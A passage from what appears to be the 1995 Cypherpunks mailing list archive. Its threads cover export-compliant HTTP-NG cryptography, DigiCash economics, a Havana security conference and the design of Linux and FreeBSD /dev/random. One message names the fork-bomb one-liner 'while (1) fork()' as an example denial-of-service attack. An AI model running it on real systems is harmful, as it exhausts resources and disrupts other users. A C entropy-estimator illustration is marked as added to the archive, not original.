ok under ITAR, but using it for confidentiality is out.

The reason I wanted to check is that I'm solidifying some of the security 
parameters for HTTP-NG so we can add them to the test implementation 
before the Dallas IETF. In addition to the slight problem of having half 
the development team on the other side of the Atlantic, I want to make at 
least a subset of the security schemes mandatory, and that means making 
the core stuff exportable.

At the moment, I'm thinking of making the mandatory schemes be Keyed MD5
for authentication, and weakened RC4 with an IV for confidentiality, with
the added stipulation being that the user must be informed when key
weakening is being used. I may swap RC4 for DES; they're both public 
domain, but RC4 is simpler. They're both shared key, but I don't make PK 
stuff mandatory. 

The other pre-defined schemes I'm planning on getting at least specced are 
3-DES and IDEA for confidentiality, SHA for hashing, and RSA & DH for 
key exchange, signatures, and authentication. Certificate format is 
currently X.509; PGP format will go in ASAP.


Simon

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Tue, 31 Oct 1995 00:32:16 +0800
To: blancw@accessone.com
Subject: Re: Pinkerton Risk Assessment & "Security 2000"
In-Reply-To: <9510300619.AA11035@pulm1.accessone.com>
Message-ID: <9510301612.AA15533@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



blancw@accessone.com said:
> They advertise their services as:

> "... the risk assessment tool for the 21st century. If you or other 
> members of  your company travel internationally, the Global Risk 
> Network  on MSN. is an  invaluable service, keeping you informed of 
> worldwide events, political  turmoil, global sensitive spots, and 
> more! Now you have direct online access to  a wealth of exclusive 
> Pinkerton information, all via your computer. You can  even order 
> hard copy reports or have customized research performed by Pinkerton  
> Risk Assessment  experts, simply type in your request. Tailored for 
> the  individual traveler, as well as the corporate executive, our 
> risk services give  you several options to know the security 
> situation anywhere."
> 

The Department of State has the same information available on Compu$erv
and possibly the internet.

Perhaps more importantly, this information is also available for free
on the Internet.

	http://dosfan.lib.uic.edu/
	gopher://dosfan.lib.uic.edu/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael J Gebis <gebis@ecn.purdue.edu>
Date: Mon, 30 Oct 1995 23:32:06 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
Message-ID: <199510301515.KAA13367@purcell.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


> >While Chaum is a brilliant cryptographer, he is an incompetent businessman
> >He has demonstrated this in numerous ways.
> >The latest being "Cash" where the bank skims off 4% to 10% every time.
> >No one is going to use digicash under these kinds of terms and 
> >conditions.

> Doesn't just about everyone do precisely this when they pay sales tax?
> Every time a buck arrives or departs a hand one pays a tax yet the
> system (you and I)continues accepting these terms albeit painfully.

Theoretically, when I pay sales tax I get something in return (better
roads, nicer schools, improved NSA wiretapping, and other government
services.)  With digicash, you're paying for the use of the money
itself.

What sort of charges do Visa/Mastercard impose upon merchants?  I
thought it was 3%; if so, I would suspect that this is the level of
"off-the-top" skim that the market will sustain, and DigiCash should
probably use a similar rate.

-- 
Mike Gebis  gebis@ecn.purdue.edu  Corporate Operating Systems Still Suck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Date: Mon, 30 Oct 1995 18:41:09 +0800
To: cypherpunks@toad.com
Subject: Cuban Security Conference
Message-ID: <"swan.cl.cam.:050770:951030102939"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Mr Guevara of the Cuban embassy in London asked me to post
this announcement. Pass it on.



		        CALL FOR PAPERS


			INFORMATICS  96


		International Conference Center
		     Pabexpo, Havana, Cuba
			March 4-9, 1996


			   INCLUDING


	3rd Ibero-American Seminar on Protection against
    Computer Viruses and Security of Information Technologies

	*	Antivirus and protection software

	*	Security of information technologies, including
		-  diagnostic and security plans
		-  risk analysis, contingency and recovery plans
		-  technical aspects: identification and
		   authentication, cryptography, security models
		-  security organisation and management, security
		   policy, information sorting, training of users
		   and authentication
		-  security evaluation
		-  integration of security systems
		-  audit trail

	*	Experience

	Chairman of the organising committee: Jose Bidot Pelaez,
	    Chairman, National Committee for Data Protection
	

			      AND


	   1st International Seminar on Information Audit

	*	Information audit in business and financial
		management

	*	Information audit and current technology

	*	Tools for information audit

	*	Controls and risks in information systems

	*	Information audit for information systems

	Chairman of the organising committee: Fransisco Deiros,
	President, Information Audit Group, National Committee
	                    of Informatics


	Papers should be sent to the convention secretariat:

		Lic. Nancy Batard Najarro
		INFORMATICS 96 Executive Secretary
		Palacio de las Convenciones
		Apartado 16046, La Habana, Cuba

		Tel: +537 33-1466 / 20-6850
		Fax: +537 33-1657 / 33-1708

		Email: infor96@cenisi.cu








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Tue, 31 Oct 1995 00:22:32 +0800
To: Michael J Gebis <cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
Message-ID: <199510301552.KAA24406@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain



>
>What sort of charges do Visa/Mastercard impose upon merchants?  I
>thought it was 3%; if so, I would suspect that this is the level of
>"off-the-top" skim that the market will sustain, and DigiCash should
>probably use a similar rate.
>
>-- 
>Mike Gebis  gebis@ecn.purdue.edu  Corporate Operating Systems Still Suck
>

Pricing is usually set so it includes the 3%. Cash prices are usually by
agreement the same as credit card. Will Digicash be an extra %age or will
the credit card agreements be changed? Else it is 3% plus digicash for those
goods that offer the credit card option.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 31 Oct 1995 00:41:28 +0800
To: Michael J Gebis <cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
In-Reply-To: <199510301515.KAA13367@purcell.ecn.purdue.edu>
Message-ID: <9510301620.AA30950@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


>What sort of charges do Visa/Mastercard impose upon merchants?  I
>thought it was 3%; if so, I would suspect that this is the level of
>"off-the-top" skim that the market will sustain, and DigiCash should
>probably use a similar rate.

Not quite 3% in that sense. The rate is variable, 35 cents plus 3%
being typical. The essential point is that this is insurance on the
deal. If the buyer does not pay their bill the money is still paid
to the merchant. If the goods are faulty the buyer may have recourse
against the card co (UK consumer credit act).

The charging structure of Digicash should be different however. Digicash
is like Mondex, it effectively gives the operator seigniorage rights
which can be highly profitable in themselves. The cash in the Digicash 
scheme is earning interest for Mark Twain Bank.


Comment heard at the firm "It's time to make another backup of the 
Internet". :-) 


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 31 Oct 1995 02:16:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: S. 1284 To Amend (C) Act
In-Reply-To: <199510300240.SAA07345@owens.ridgecrest.ca.us>
Message-ID: <199510301634.LAA10488@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tom Bell writes:
> [S. 1284 would]:  1) make[] transmission of copies a 
> type of publication (and thus potentially a means of infringing a 
> copyright); and 2) prohibit[] the importation, manufacture, or 
> distribution of any device the primary purpose of which is to 
> deactivate any technological protections that prevent or inhibit the 
> violation of copyrights.

M. F. (Pat) Sprague writes:
# What occurs to me is that PGP could be considered a "device" to obscure 
# contents of data thereby preventing the determination of a copyright 
# violation.

Encryption (as opposed to decryption) doesn't defeat any mechanisms that 
stop someone from violating a copyright. It can make the _detection_ 
harder, but not the _commission_. So I don't think that should be a concern.
(As usual, IANAL.)

Building upon Tom Bell's and cjs' observations, I suppose it could be argued
that encryption can be employed as a means of copyright protection. Hence
some decryption programs might be outlawed as devices intended to
"deactivate" copyright-protecting technology. 

I can't think of any c'punks projects so far that try to pierce security 
schemes meant to shield materials from copyright violations. Since many 
cypherpunks aren't inclined to preserve copyrights, they lack a motive for
ensuring the integrity of copyright protection methods. Cypherpunks launch
attempts to crack security systems in order ultimately to improve them, not 
for the sake of breaking them. I expect the alt.2600 crowd would be more
directly affected by S. 1284.

As a matter of principle, though, I don't think we should be amicable to a
bill like S. 1284. It's a bit disturbing to see that it's cosponsored by
Sens. Patrick Leahy & Russ Feingold, who led the Senate opposition to the
Indecent Act. I find it hard to imagine that the bill will encounter any
significant legislative obstacles.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 31 Oct 1995 01:04:15 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Important Digital Cash Question...
In-Reply-To: <Pine.SOL.3.91.951029212520.22281C-100000@chivalry>
Message-ID: <9510301637.AA21874@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>What's the right name to use for the Banker? I've been using "Nick", 
>after Nick Leeson; any other suggestions?

That's Lessen, not Leeson. As in "I will lessen the amount of money you
have on deposit".

Actually you should have names beginning with I and A for Issuer and 
Acquirer. But that messes up Alice. 

I think that the banker's name should be Ethel however.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 31 Oct 1995 02:16:54 +0800
To: cypherpunks@toad.com
Subject: DOD_com
Message-ID: <199510301650.LAA13111@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-30-95. Wash Rag:


   "Pentagon Plans More Espionage. Business Fronts Abroad
   Would Expand Efforts Of a Unified Service."

      The Defense Department has merged its separate covert
      intelligence operations and plans to expand its
      espionage abroad, starting with establishment of phony
      businesses overseas as cover, and has formed the Defense
      HUMINT (Human Intelligence) Service, or DHS. Under the
      fiscal 1996 intelligence authorization bill, the DHS has
      been given a trial period of three years to carry on
      commercial activities "to provide cover security to
      intelligence collection activities undertaken abroad."
      The authority "to provide bona fide commercial cover,"
      was so that DHS's covert operatives could "withstand
      detailed investigation by hostile foreign intelligence
      services as well as domestic scrutiny."

      ... scandal of the Army's Yellow Fruit op ...

      CIA case officers are working with DHS on the cover
      companies abroad; cooperation is needed because in
      recent years military spies overseas inadvertently had
      set up relations with foreigners known to be double
      agents.

      Sen. Bob Kerrey called on CIA Director John M. Deutch to
      "develop his human collectors, planning 10 or more years
      in advance for their peak usefulness," a reference to
      placing them abroad under deep cover for use in future
      crises.


   DOD_com  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 31 Oct 1995 02:11:03 +0800
To: cypherpunks@toad.com
Subject: Re: Important Digital Cash Question...
Message-ID: <v02120d06acbab250b4e9@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>I think that the bankers name should be Ethel however.
>
>        Phill

Wait, wait! I have another one. I call digital cash bankers "underwriters",
because they're basically underwriting digital certificates, like an
underwriter in the capital markets does.

So, we need a "U" name...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 31 Oct 1995 02:04:26 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Digicash will not fly (not)
In-Reply-To: <acb9bb9700021004f83d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951030121921.17834E-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



One point worth noting is that the 5% cut used to be a typical fee for 
credit-card transactions. However, that cut only happened once per 
purchase, whereas digicash may incur this fee many more times. 

When I daydreamed about setting up a digicash issuer, I was thinking on 
the lines of a 2% fee for converting real money into digicash, then 
refunding any excess beyond cost of operations at the end of the year. 

Converting from real money to digicash is the most risky part of 
operations, so reserves should be proportional to this. Since my fantasy 
bank has a policy of not paying interest on digicash accounts, and 
keeping all assets in cash on (at worst) overnight deposit, this keeps 
things really safe. BTW, since I've got an aunt who lives in St. Brelade, 
the bank is in St Helier, Jersey, which has the great advantage of being 
one of the few Tax Havens to be able to get the Archers on FM.

Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 31 Oct 1995 06:48:34 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re:  Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510301954.AA07200@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951030125419.429B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995, Rich Salz wrote:

> The licensed version of RC4, or the software that was posted anonymously?

Cop-out: That algorithm described in Applied Cryptography 2nd Edition 
under the label RC4.

> Where would you swap RC4 for DES?

The swap would take place in the list of schemes that must be supported 
by conforming applications. 

> I assume your added stipulation is a "should" not a "must" item.

Correct [strong should, but still should]

> How are you going to handle key management and naming?

The protocol's part of key management for OOB shared keys is taken care 
of by naming; session key exchange with PK is not yet fully defined, but 
will  look a lot like either SKIP or Photuris. 

Naming:
   Names are strings, of the format <domain>:<name>, where domain is the
name-space from which the names are taken. The following domains are
pre-defined: 

DN:	X.500 Distinguished name. The name portion contains the RFC1485 
	ascii encoding of the DN.

URN:	Uniform Resource Name. The name consists of a URN (whatever that 
	turns out to be).

PGP:	PGP format name. A PGP user name.


Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 31 Oct 1995 02:42:53 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Cuban Security Conference
In-Reply-To: <199510301723.JAA22047@ix9.ix.netcom.com>
Message-ID: <Pine.3.89.9510301337.A30667-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 30 Oct 1995, Bill Stewart wrote:

> I wonder if they'd be receptive to talks on private communications,
> digicash, tax avoidance through digital technology, anarchy and
> collapse of government power, etc. :-)   (Maybe they would;

For that matter is civilian use of strong (or any other kind) crypto actually
legal in Cuba? Anyone know the policies? (duh, lemme guess...)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Tue, 31 Oct 1995 03:40:01 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
Message-ID: <Pine.SUN.3.91.951030134533.5999A-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 30 Oct 1995, Simon Spero wrote:

> The reason I wanted to check is that I'm solidifying some of security 
> parameters for HTTP-NG so we can add them to the test implementation 
> before the Dallas IETF. In addition to the slight problem of having half 
> the development team on the other side of the Atlantic, I want to make at 
> least a subset of the security schemes mandatory, and that means making 
> the core stuff exportable.

  Since you deal with security issues maybe you can help me to learn 
about some issues with encryption.  I am talking with one of the 
administration people about putting PGP on the system for everyone to 
use, but there are issues for them (the admin) as they might be liable, 
even if they can't read the e-mail.  What other legal considerations 
should be evaluated?
  Are there any large organizations (like any other universities) that 
allow their students to use PGP, and have the system in place to make it 
easier for the students?  If it is offered here I might be the one to add 
to the mail program (pine) that is generally used to transparently use 
PGP, which is what I mean by having a system set up for the encryption. 
  Thanx for any help.  Take care and have fun.

James Black
black@suntan.eng.usf.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 30 Oct 1995 13:32:14 +0800
To: daw@quito.CS.Berkeley.EDU (David A Wagner)
Subject: Re: MD4-derived hash functions
In-Reply-To: <199510290028.UAA12628@book.hks.net>
Message-ID: <199510300353.AA55657@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>The conclusion to take away from this is simple: double encryption
>doesn't give you much extra security over single encryption.  Don't
>use double encryption.

That doesn't make sense. If one accepts that double encryption is securer than
single encryption, whether marginally or twice as secure, why not use it?

I would rather stand behind a steel door and a wooden door than a steel door
alone if anyone was shooting rounds at me.

Cheers,
Mark
mark@lochard.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 31 Oct 1995 05:26:43 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510301816.UAA14080@grumble.grondar.za>
Message-ID: <9510301856.AA22851@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 30 Oct 1995 20:16:24 +0200
   From: Mark Murray <mark@grondar.za>

   A colleague drew my attention to this, and I was so pleased with it that
   I ported it to FreeBSD.

Which version did you grab?  More recent versions of the driver use a
more efficient mixing algorithm suggested by Colin Plumb.  There's also
the beginnings of support for user-mode daemons to add randomness into
the random pool by writing to /dev/random.  I also added support for
reading the instruction timing register for x86 platforms that support
it. 

   2) We felt that hooking all interrupts might be dangerous. IDE drives can
   interrupt at a heck of a rate, and so can some serial ports, and we felt
   that in these cases _not_ using the interrupt was a good idea. So I
   added an ioctl to allow the superuser to select his own set, appropriate
   to the hardware in use. It is nearly impossible to do this automatically.

Indeed; I can't emphasize this enough.  The clock interrupt, for
example, is a very bad irq to try to use.  In the Linux driver, only
device drivers who register their interrupt driver with the
SA_SAMPLE_RANDOM flag actually have the interrupt timings sampled for
the random number generator.

People have suggested making it possible to select at run-time
which interrupts to sample, instead of compiling it into the device
drivers.  I've generally not been convinced this is a good idea, because
most system administrators won't likely know which irq's are good and
which are bad for random number generation.  For example, although it
may not be obvious, the network interrupt may not be a good choice,
since an adversary who is monitoring the ethernet cable can make a
pretty good guess about the timing of your network interrupts, and hence
what the likely inputs to the random number pool might be.

   Gimme a yell if you want copies :-)

Sure, why not.   I'd be interested to see what you did.

						- Ted
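
[Added example, not part of the original message and not code from the Linux or FreeBSD driver.] The point about the clock and network interrupts above can be checked with a simplified delta-based entropy estimator run over timestamp traces. The estimator, its 12-bit cap, the trace values and the wire observer's measurement error are all assumptions constructed for this illustration.

```c
/* Added illustration: NOT code from the Linux or FreeBSD /dev/random driver.
 * The estimator, the 12-bit cap and every timestamp below are assumptions
 * constructed for this example. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define N_SAMPLES  8
#define MAX_CREDIT 12            /* assumed cap on bits credited per sample */

struct irq_source {
    uint32_t last_time;          /* timestamp of the previous interrupt */
    int32_t  last_delta;         /* previous inter-arrival time */
    int      samples;            /* how many timestamps have been seen */
};

/* floor(log2(v)); returns 0 for v == 0 or v == 1 */
static unsigned ilog2(uint32_t v)
{
    unsigned bits = 0;
    while (v > 1) { v >>= 1; bits++; }
    return bits;
}

/* Credit one timestamp: log2 of the smaller of |delta| and |delta2|, so a
 * perfectly periodic source (delta2 == 0) earns nothing. */
static unsigned credit_sample(struct irq_source *s, uint32_t now)
{
    int32_t delta  = (int32_t)(now - s->last_time);
    int32_t delta2 = delta - s->last_delta;
    uint32_t a, b;
    unsigned bits;

    s->last_time  = now;
    s->last_delta = delta;
    if (s->samples < 2) {        /* delta2 needs two earlier timestamps */
        s->samples++;
        return 0;
    }
    a = (uint32_t)abs(delta);
    b = (uint32_t)abs(delta2);
    bits = ilog2(a < b ? a : b);
    return bits > MAX_CREDIT ? MAX_CREDIT : bits;
}

/* Total bits the estimator would credit for a whole trace. */
unsigned total_credit(const uint32_t *t, size_t n)
{
    struct irq_source s = {0, 0, 0};
    unsigned total = 0;
    size_t i;

    for (i = 0; i < n; i++)
        total += credit_sample(&s, t[i]);
    return total;
}

/* Upper bound on what a wire observer still does not know about the
 * credited samples: if its inter-packet times match the host's deltas to
 * within +/-E, each delta has at most 2E+1 candidates. */
unsigned observer_residual_bits(const uint32_t *irq, const uint32_t *wire,
                                size_t n)
{
    uint32_t max_err = 0;
    size_t i;

    if (n < 3)
        return 0;
    for (i = 1; i < n; i++) {
        int32_t err = (int32_t)(irq[i] - irq[i - 1])
                    - (int32_t)(wire[i] - wire[i - 1]);
        uint32_t e = (uint32_t)abs(err);
        if (e > max_err)
            max_err = e;
    }
    /* ceil(log2(2E+1)) bits per credited sample; n-2 samples are credited */
    return (unsigned)(n - 2) * (max_err ? ilog2(2 * max_err) + 1 : 0);
}

/* Constructed traces, in arbitrary timer ticks. */
const uint32_t clock_irq[N_SAMPLES] =   /* fixed-period clock tick */
    {10000, 20000, 30000, 40000, 50000, 60000, 70000, 80000};
const uint32_t disk_irq[N_SAMPLES] =    /* jittery disk completions */
    {5000, 13123, 25073, 34077, 44854, 53304, 64516, 74387};
const uint32_t net_wire[N_SAMPLES] =    /* packet times seen on the cable */
    {1000, 2510, 2930, 6230, 6325, 9035, 9915, 11914};
const uint32_t net_irq[N_SAMPLES] =     /* same packets, +49..51 tick latency */
    {1050, 2561, 2979, 6280, 6376, 9085, 9964, 11965};

int main(void)
{
    printf("clock  : credited %u bits\n", total_credit(clock_irq, N_SAMPLES));
    printf("disk   : credited %u bits\n", total_credit(disk_irq, N_SAMPLES));
    printf("network: credited %u bits, wire observer left with <= %u bits\n",
           total_credit(net_irq, N_SAMPLES),
           observer_residual_bits(net_irq, net_wire, N_SAMPLES));
    return 0;
}
```

The estimator sees only jitter, so it credits the network trace almost as generously as the disk trace; nothing in the timing data reveals that someone on the cable already knows most of it, which is why the choice of sampled interrupts has to come from knowledge of the source.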




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David HM Spector <spector@zeitgeist.com>
Date: Tue, 31 Oct 1995 04:10:19 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Important Digital Cash Question...
In-Reply-To: <v02120d06acbab250b4e9@[199.0.65.105]>
Message-ID: <199510301923.OAA09371@zeitgeist.zeitgeist.com>
MIME-Version: 1.0
Content-Type: text/plain





um... perhaps, Ursula the Underwriter...?


regards,
  David
-----------------------------------------------------------------------------
David HM Spector				Software Developer & Nice Guy
http://zeitgeist.com				spector@zeitgeist.com
voice: +1 212.721.6974				fax: +1 212.721.9084
                               --------
SJM, 32, seeks SJF for meaningful rel... What? This ISN'T the VOICE personals?!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Tue, 31 Oct 1995 05:06:25 +0800
To: cypherpunks@toad.com
Subject: [joanne@theory.lcs.mit.edu: MIT TOC SEMINAR--DAN BONEH--Thursday, November 2--4:15pm!!]
Message-ID: <199510301948.OAA01069@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



From: joanne@theory.lcs.mit.edu (Joanne Talbot)
Date: Mon, 30 Oct 95 12:23:33 EST
To: theory-seminars@theory.lcs.mit.edu
Reply-To: theory-seminars-request@theory.lcs.mit.edu
Subject: MIT TOC SEMINAR--DAN BONEH--Thursday, November 2--4:15pm!!

                       MIT TOC SEMINAR

                 Thursday, November 2, 1995

       Refreshments at 4:00pm, Talk at 4:15pm in NE43-518

       ``Quantum Cryptoanalysis of Hidden Linear Forms''

                        by Dan Boneh
                    Princeton University

                         ABSTRACT

Recently there has been a great deal of interest in the power of
Quantum Computers. The driving force is the recent beautiful result of
Shor that shows that discrete log and factoring are solvable in random
quantum polynomial time. We use a method similar to Shor's to obtain a
general theorem about quantum polynomial time. We show that any
cryptosystem based on what we refer to as a `hidden linear form' can
be broken in quantum polynomial time. Our results imply that the
discrete log problem is doable in quantum polynomial time over any
group including Galois fields and elliptic curves.

Joint work with Richard Lipton.

Host: Shafi Goldwasser




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 31 Oct 1995 05:33:45 +0800
To: ses@tipper.oit.unc.edu
Subject: Re:  Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510301954.AA07200@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>At the moment, I'm thinking of making the mandatory schemes be Keyed MD5
>for authentication, and weakened RC4 with an IV for confidentiality, with
>the added stipulation being that the user must be informed when key
>weakening is being used. I may swap RC4 for DES; they're both public 
>domain, but RC4 is simpler. They're both shared key, but I don't make PK 
>stuff mandatory. 

The licensed version of RC4, or the software that was posted anonymously?

Do you really feel comfortable basing an IETF standard on that?  When
you use the term RC4 do you mean the real version or the posted one,
what will you do if they ever conflict?  Can you even use the name RC4
for the posted version?  It seems to me that RC4 means the RSA licensed
code, which presumably you wanted to avoid when you wrote no mandatory PK.

Where would you swap RC4 for DES?

I assume your added stipulation is a "should" not a "must" item.

How are you going to handle key management and naming?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 31 Oct 1995 05:27:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
Message-ID: <199510302038.PAA21082@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Simon writes:
> I may swap RC4 for DES; they're both public domain, but RC4 is simpler. 

Er, at last report RSADSI was still claiming RC4 as a trade secret, in spite
of the posting of the (convincing) alleged RC4.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 30 Oct 1995 13:05:32 +0800
To: jirib@cs.monash.edu.au
Subject: Re: newsweek oct 30 Levy digital cash article
In-Reply-To: <199510272049.NAA29753@netcom7.netcom.com>
Message-ID: <199510300447.PAA19230@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Steven Levy <steven@echonyc.com>
  and cypherpunks@toad.com
  and "Vladimir Z. Nuri" <vznuri@netcom.com>

V.Z.N (order of paragraphs rearranged by J.B.):
...
> I would suggest to all companies developing e-cash that they print up
> a carefully designed FAQ in which their cash properties 
> are compared directly with parallel
> properties of credit cards such as like the item above, because the
...

Well, why not one of us?

Please have a look at http://www.cs.monash.edu.au/~jirib/ecash-cc.html
and tell me what you think. Any good?

...
> how would the bank handle a situation in which the consumer says, "oops,
> my hard drive was compromised. all of the following cash was NOT spent
> by me."
...

Easy: whoever is at the bank first gets the cash. So you simply spend
all the coins (ie deposit it back to your account), and that's that.

...
> or, the bank might say, "oh, well, that cash was not spent yet. we can issue
> a replacement and bar the cash from being spent".
...

Yup. No special protocol is needed, either.

...
> S.L.:
> >Question: will people's worries about losing their e-money lead them to 
> >accept a higher degree of traceability as a tradeoff?  
...

I read in the newspaper that the "Eros Foundation" (or whatever the name
is) has the second-largest mailing list in Australia. (The article was
about how they could affect elections should one or the other party promise
to ban X (non-violent erotica), and generally concluded that they could,
if they haven't already.) I wonder if that'd be a good market for
untraceable transactions?


Please tell me what you think of the page...
http://www.cs.monash.edu.au/~jirib/ecash-cc.html

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 31 Oct 1995 07:10:10 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510301925.VAA27116@grumble.grondar.za>
Message-ID: <9510302119.AA24959@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 30 Oct 1995 21:25:50 +0200
   From: Mark Murray <mark@grondar.za>

   Version 0.92 21st Sept 1995.

Yup, there's a more recent version in the Linux tree at this point.

   Something I didn't mention earlier; we felt that letting the unwashed
   masses read /dev/*random was not a good idea, as they could deplete
   the pool of entropy all too easily for attack purposes. 

That should be a system administration issue.  If someone wants to make
/dev/random readable only by root at their site, that's their business.
I don't see any point in trying to enforce that in the kernel code.

I don't agree that restricting read access is useful.  First of all, if
the pool of entropy is depleted, someone who tries to obtain entropy by
reading /dev/random will know that they didn't get enough entropy.  So
assuming a program that actually checks return values from system calls,
this is at worst a denial of service attack, and there are much easier
ways of performing those sorts of attacks: "while (1) fork()", for
example.

Secondly, making /dev/random only readable by "privileged programs"
means that people won't be able to compile their own version of PGP that
can take advantage of the random number generator.  Instead, they would
have to use a setuid version of PGP, and I'm quite sure PGP wasn't
written such that it would be safe to turn on its setuid bit.  

Finally, even if you did have trustworthy applications which you could
setuid and only allow those programs to have access to /dev/random,
someone who repeatedly ran those applications could still end up
depleting the pool of entropy.

So in the general case I would advise that /dev/random be left world
readable, since you *do* want general user programs to have access to
high quality random numbers.  

   For the same (or similar) reason, giving the said unwashed masses
   _write_ privilege might allow them to set /dev/*random to a known
   state. You've probably already thought of this, but I just had to say
   it :-).

Again, /dev/random can be set to whatever permissions the system
administrator wants.  Secondly, writing to /dev/random merely adds
randomness to the pool, via the mixing algorithm.  It won't actually
